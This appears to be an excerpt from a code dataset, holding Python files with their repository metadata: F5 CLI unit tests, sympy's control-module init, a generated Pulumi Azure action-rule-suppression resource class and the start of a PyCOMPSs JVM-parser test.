""" Command service create declaration of an installed component
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to create a 'do' declaration
Then
- The result of the create action is logged
"""
mock_service = MagicMock()
create_response = {
'foo': 'bar'
}
mock_service.create.return_value = create_response
mock_extension_client = do_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
mock_utils_core_convert = mocker.patch(
"f5cli.utils.core.convert_to_absolute")
mock_utils_core_convert.return_value = "fake location"
result = self.runner.invoke(cli, ['extension', 'do', 'create',
'--declaration', './test/fake_declaration.json'])
assert result.output == json.dumps(create_response, indent=4, sort_keys=True) + '\n'
mock_utils_core_convert.assert_has_calls(
[call('./test/fake_declaration.json')])
# pylint: disable=unused-argument
def test_cmd_service_show_failover_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show failover (/GET trigger) from CF extension
Given
- 'cf' component is installed
When
- User attempts to show-failover
Then
- The result of show-failover is logged
"""
mock_service = MagicMock()
show_failover_response = {
'foo': 'bar'
}
mock_service.show_trigger.return_value = show_failover_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-failover'])
assert result.output == json.dumps(show_failover_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_info_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show-info of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to show-info
Then
- The result of show-info is logged
"""
mock_service = MagicMock()
show_info_response = {
'foo': 'bar'
}
mock_service.show_info.return_value = show_info_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-info'])
assert result.output == json.dumps(show_info_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_inspect_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service show-inspect of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to show-inspect
Then
- The result of show-inspect is logged
"""
mock_service = MagicMock()
show_inspect_response = {
'foo': 'bar'
}
mock_service.show_inspect.return_value = show_inspect_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'show-inspect'])
assert result.output == json.dumps(show_inspect_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_reset_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service reset of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to reset
Then
- The result of reset is logged
"""
mock_service = MagicMock()
reset_response = {
'foo': 'bar'
}
mock_service.reset.return_value = reset_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'reset', '--auto-approve'])
assert result.output == json.dumps(reset_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_trigger_cf_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
cf_extension_client_fixture):
""" Command service trigger failover of CF extension component
Given
- BIG-IP is up
- 'cf' component is installed
When
- User attempts to trigger
Then
- The result of trigger-failover is logged
"""
mock_service = MagicMock()
trigger_response = {
'foo': 'bar'
}
mock_service.trigger.return_value = trigger_response
mock_extension_client = cf_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(cli, ['extension', 'cf', 'trigger-failover'])
assert result.output == json.dumps(trigger_response, indent=4, sort_keys=True) + '\n'
def test_cmd_service_unsupported_action(self):
""" Unsupported command service action
Given
- BIG-IP is up
- 'as3' component is installed
When
- User attempts to perform the 'remove' action on the 'as3' component
Then
- Non-implemented action exception is thrown
"""
result = self.runner.invoke(
cli, ['extension', 'as3', 'remove'])
assert "invalid choice: remove" in result.output
assert result.exception
| 39.600449 | 100 | 0.553282 | 3,411 | 35,284 | 5.470537 | 0.055995 | 0.068382 | 0.06313 | 0.036977 | 0.885906 | 0.863344 | 0.84298 | 0.824652 | 0.819185 | 0.797053 | 0 | 0.010427 | 0.363961 | 35,284 | 890 | 101 | 39.644944 | 0.82105 | 0.166676 | 0 | 0.711152 | 0 | 0 | 0.116649 | 0.030083 | 0 | 0 | 0 | 0 | 0.051188 | 1 | 0.056673 | false | 0.001828 | 0.009141 | 0 | 0.076782 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
faa8400da404c4c8e7769efe3df130cab96d1260 | 178 | py | Python | sympy/physics/control/__init__.py | joha2/sympy | 5c54e5b78bc907569f56996601603b7b574dfc73 | ["BSD-3-Clause"] | null | null | null | sympy/physics/control/__init__.py | joha2/sympy | 5c54e5b78bc907569f56996601603b7b574dfc73 | ["BSD-3-Clause"] | 10 | 2021-07-21T20:56:57.000Z | 2021-07-31T16:35:28.000Z | sympy/physics/control/__init__.py | joha2/sympy | 5c54e5b78bc907569f56996601603b7b574dfc73 | ["BSD-3-Clause"] | null | null | null |
from .lti import TransferFunction, Series, Parallel, Feedback, TransferFunctionMatrix
__all__ = ['TransferFunction', 'Series', 'Parallel', 'Feedback', 'TransferFunctionMatrix']
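A brief, hedged usage sketch for the classes re-exported above (illustrative only, not part of the original `__init__.py`); it assumes the standard `sympy.physics.control.lti` API, and the names `plant` and `controller` are made up for the example:
from sympy.abc import s
from sympy.physics.control import TransferFunction, Series, Feedback

# Plant and controller as rational transfer functions in s
plant = TransferFunction(1, s**2 + 2*s + 1, s)
controller = TransferFunction(s + 1, s, s)
# Cascade the controller with the plant, then close a unity-feedback loop
open_loop = Series(controller, plant)
closed_loop = Feedback(open_loop, TransferFunction(1, 1, s))
# doit() collapses the interconnection into a single TransferFunction
print(closed_loop.doit())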
| 44.5 | 90 | 0.786517 | 14 | 178 | 9.714286 | 0.642857 | 0.323529 | 0.441176 | 0.558824 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 178 | 3 | 91 | 59.333333 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0.337079 | 0.123596 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
face4ee107d4dbf60d3aecbf0045a2409c6e059a | 24,995 | py | Python | sdk/python/pulumi_azure/monitoring/action_rule_suppression.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | ["ECL-2.0", "Apache-2.0"] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/monitoring/action_rule_suppression.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | ["ECL-2.0", "Apache-2.0"] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/monitoring/action_rule_suppression.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | ["ECL-2.0", "Apache-2.0"] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ActionRuleSuppressionArgs', 'ActionRuleSuppression']
@pulumi.input_type
class ActionRuleSuppressionArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
suppression: pulumi.Input['ActionRuleSuppressionSuppressionArgs'],
condition: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing an ActionRuleSuppression resource.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionSuppressionArgs'] suppression: A `suppression` block as defined below.
:param pulumi.Input['ActionRuleSuppressionConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "suppression", suppression)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def suppression(self) -> pulumi.Input['ActionRuleSuppressionSuppressionArgs']:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@suppression.setter
def suppression(self, value: pulumi.Input['ActionRuleSuppressionSuppressionArgs']):
pulumi.set(self, "suppression", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ActionRuleSuppressionState:
def __init__(__self__, *,
condition: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']] = None,
suppression: Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ActionRuleSuppression resources.
:param pulumi.Input['ActionRuleSuppressionConditionArgs'] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input['ActionRuleSuppressionScopeArgs'] scope: A `scope` block as defined below.
:param pulumi.Input['ActionRuleSuppressionSuppressionArgs'] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if condition is not None:
pulumi.set(__self__, "condition", condition)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if suppression is not None:
pulumi.set(__self__, "suppression", suppression)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ActionRuleSuppressionConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ActionRuleSuppressionScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def suppression(self) -> Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']]:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@suppression.setter
def suppression(self, value: Optional[pulumi.Input['ActionRuleSuppressionSuppressionArgs']]):
pulumi.set(self, "suppression", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ActionRuleSuppression(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Monitor Action Rule whose type is suppression.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_rule_suppression = azure.monitoring.ActionRuleSuppression("exampleActionRuleSuppression",
resource_group_name=example_resource_group.name,
scope=azure.monitoring.ActionRuleSuppressionScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
suppression=azure.monitoring.ActionRuleSuppressionSuppressionArgs(
recurrence_type="Weekly",
schedule=azure.monitoring.ActionRuleSuppressionSuppressionScheduleArgs(
start_date_utc="2019-01-01T01:02:03Z",
end_date_utc="2019-01-03T15:02:07Z",
recurrence_weeklies=[
"Sunday",
"Monday",
"Friday",
"Saturday",
],
),
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleSuppression:ActionRuleSuppression example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionRuleSuppressionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Monitor Action Rule whose type is suppression.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_action_rule_suppression = azure.monitoring.ActionRuleSuppression("exampleActionRuleSuppression",
resource_group_name=example_resource_group.name,
scope=azure.monitoring.ActionRuleSuppressionScopeArgs(
type="ResourceGroup",
resource_ids=[example_resource_group.id],
),
suppression=azure.monitoring.ActionRuleSuppressionSuppressionArgs(
recurrence_type="Weekly",
schedule=azure.monitoring.ActionRuleSuppressionSuppressionScheduleArgs(
start_date_utc="2019-01-01T01:02:03Z",
end_date_utc="2019-01-03T15:02:07Z",
recurrence_weeklies=[
"Sunday",
"Monday",
"Friday",
"Saturday",
],
),
),
tags={
"foo": "bar",
})
```
## Import
Monitor Action Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/actionRuleSuppression:ActionRuleSuppression example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.AlertsManagement/actionRules/actionRule1
```
:param str resource_name: The name of the resource.
:param ActionRuleSuppressionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionRuleSuppressionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionRuleSuppressionArgs.__new__(ActionRuleSuppressionArgs)
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
if suppression is None and not opts.urn:
raise TypeError("Missing required property 'suppression'")
__props__.__dict__["suppression"] = suppression
__props__.__dict__["tags"] = tags
super(ActionRuleSuppression, __self__).__init__(
'azure:monitoring/actionRuleSuppression:ActionRuleSuppression',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']]] = None,
suppression: Optional[pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ActionRuleSuppression':
"""
Get an existing ActionRuleSuppression resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[pulumi.InputType['ActionRuleSuppressionSuppressionArgs']] suppression: A `suppression` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionRuleSuppressionState.__new__(_ActionRuleSuppressionState)
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["suppression"] = suppression
__props__.__dict__["tags"] = tags
return ActionRuleSuppression(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.ActionRuleSuppressionCondition']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def scope(self) -> pulumi.Output[Optional['outputs.ActionRuleSuppressionScope']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def suppression(self) -> pulumi.Output['outputs.ActionRuleSuppressionSuppression']:
"""
A `suppression` block as defined below.
"""
return pulumi.get(self, "suppression")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 44.713775 | 228 | 0.64793 | 2,621 | 24,995 | 6.011064 | 0.080122 | 0.084481 | 0.079594 | 0.033513 | 0.868169 | 0.852555 | 0.833323 | 0.820755 | 0.811425 | 0.805712 | 0 | 0.006675 | 0.25077 | 24,995 | 558 | 229 | 44.793907 | 0.834624 | 0.354791 | 0 | 0.771331 | 1 | 0 | 0.141301 | 0.079452 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16041 | false | 0.003413 | 0.023891 | 0 | 0.279863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4f042972143dddd108c391e36698977053ed0bbf | 8,945 | py | Python | compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py | eflows4hpc/compss | c497f6d34722103c6c8f83ebc314b495573ce054 | ["Apache-2.0"] | null | null | null | compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py | eflows4hpc/compss | c497f6d34722103c6c8f83ebc314b495573ce054 | ["Apache-2.0"] | null | null | null | compss/programming_model/bindings/python/src/pycompss/tests/util/test_jvm_parser.py | eflows4hpc/compss | c497f6d34722103c6c8f83ebc314b495573ce054 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
import os
import tempfile
import shutil
from pycompss.util.exceptions import PyCOMPSsException
def test_jvm_parser():
from pycompss.util.jvm.parser import convert_to_dict
jvm_opt_file = tempfile.NamedTemporaryFile(delete=False).name
temp_folder = tempfile.mkdtemp()
jvm_expected_result = {
"+PerfDisableSharedMem": True,
"-UsePerfData": True,
"+UseG1GC": True,
"+UseThreadPriorities": True,
"ThreadPriorityPolicy=42": True,
"-Dlog4j.configurationFile": "/opt/COMPSs/Runtime/configuration/log/COMPSsMaster-log4j.debug", # noqa: E501
"-Dcompss.to.file": "false",
"-Dcompss.project.file": "/opt/COMPSs/Runtime/configuration/xml/projects/default_project.xml", # noqa: E501
"-Dcompss.resources.file": "/opt/COMPSs/Runtime/configuration/xml/resources/default_resources.xml", # noqa: E501
"-Dcompss.project.schema": "/opt/COMPSs/Runtime/configuration/xml/projects/project_schema.xsd", # noqa: E501
"-Dcompss.resources.schema": "/opt/COMPSs/Runtime/configuration/xml/resources/resources_schema.xsd", # noqa: E501
"-Dcompss.lang": "python",
"-Dcompss.summary": "false",
"-Dcompss.task.execution": "compss",
"-Dcompss.storage.conf": "null",
"-Dcompss.streaming": "null",
"-Dcompss.streaming.masterName": "null",
"-Dcompss.streaming.masterPort": "null",
"-Dcompss.core.count": "50",
"-Dcompss.appName": "increment",
"-Dcompss.uuid": "dc126fe7-1b0a-4360-80f2-55c815e2e604",
"-Dcompss.baseLogDir": "",
"-Dcompss.specificLogDir": "",
"-Dcompss.appLogDir": temp_folder,
"-Dcompss.graph": "false",
"-Dcompss.monitor": "0",
"-Dcompss.tracing": "0",
"-Dcompss.extrae.file": "null",
"-Dcompss.comm": "es.bsc.compss.nio.master.NIOAdaptor",
